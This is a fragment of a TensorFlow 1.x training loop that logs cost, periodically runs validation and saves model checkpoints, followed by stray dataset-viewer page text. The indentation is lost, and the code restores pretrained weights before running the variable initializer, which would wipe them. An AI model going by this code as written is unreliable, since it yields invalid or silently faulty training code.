summary_writer = tf.summary.FileWriter(
FLAGS.event_log_dir, graph=sess.graph, flush_secs=10)
if FLAGS.pretrained_model:
saver.restore(sess, FLAGS.pretrained_model)
tf.train.start_queue_runners(sess)
sess.run(tf.global_variables_initializer())
tf.logging.info('iteration number, cost')
# Run training.
for itr in range(FLAGS.num_iterations):
# Generate new batch of data.
feed_dict = {model.iter_num: np.float32(itr),
model.lr: FLAGS.learning_rate}
cost, _, summary_str = sess.run([model.loss, model.train_op, model.summ_op],
feed_dict)
# Print info: iteration #, cost.
tf.logging.info(str(itr) + ' ' + str(cost))
if (itr) % VAL_INTERVAL == 2:
# Run through validation set.
feed_dict = {val_model.lr: 0.0,
val_model.iter_num: np.float32(itr)}
_, val_summary_str = sess.run([val_model.train_op, val_model.summ_op],
feed_dict)
summary_writer.add_summary(val_summary_str, itr)
if (itr) % SAVE_INTERVAL == 2:
tf.logging.info('Saving model.')
saver.save(sess, FLAGS.output_dir + '/model' + str(itr))
if (itr) % SUMMARY_INTERVAL:
summary_writer.add_summary(summary_str, itr)
tf.logging.info('Saving model.')
saver.save(sess, FLAGS.output_dir + '/model')
tf.logging.info('Training complete')
tf.logging.flush()
if __name__ == '__main__':
app.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.